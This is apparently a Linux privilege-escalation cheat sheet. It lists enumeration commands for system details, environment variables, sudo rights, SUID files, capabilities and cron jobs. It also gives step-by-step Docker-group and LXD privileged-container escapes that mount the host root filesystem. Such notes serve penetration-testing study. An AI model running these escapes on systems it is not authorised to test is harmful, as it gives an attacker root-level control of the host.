Obtain information about the system architecture, distribution, and kernel version.
uname -a # System information
lsb_release -a # Distribution information
getconf LONG_BIT # System architecture
cat /proc/version # Kernel version
cat /etc/os-release # OS details
Path
Check if you have write permissions for any directory in the PATH.
Sometimes we can find password or sensitive information in environment variables.
env # Environment variables
set # Shell variables
Groups
List all the groups users belongs to.
id [user]
groups [user]
Docker
If you belong to the Docker group, you could mount the filesystem within a container and have full access to it, allowing you to modify it.
docker run -it --rm -v /:/mnt alpine chroot /mnt sh
LXD/LXC
Similar to Docker, with LXD/LXC, we can also mount the filesystem within a container, granting full access to it.
# On your machine, download and build an alpine image and transfer it to the host
git clone https://github.com/saghul/lxd-alpine-builder && cd lxd-alpine-builder && sudo ./build-alpine
# Import the image
lxc image import ./alpine.tar.gz --alias privimg
# Initialize
lxd init
# Create the containter
lxc init privimg privcont -c security.privileged=true
# Mount the filesystem
lxc config device add privcont privdev disk source=/ path=/mnt/root recursive=true
# Start the container
lxc start privcont
# Interactive shell
lxc exec privcont /bin/sh
Sudo
# List user privileges
sudo -l
# Version
sudo -V | grep "Sudo ver"
Capabilities
getcap -r / 2>/dev/null
SUID
find / -type f -perm -4000 -ls 2>/dev/null
Open Ports
ss -nltp
netstat -punta
Cron Jobs
crontab -l
find / -name "cron*" 2>/dev/null
ls -l /var/log/syslog
ls -l /var/log/cron
Process Monitor
You can add words to the blacklist on the grep -Ev section.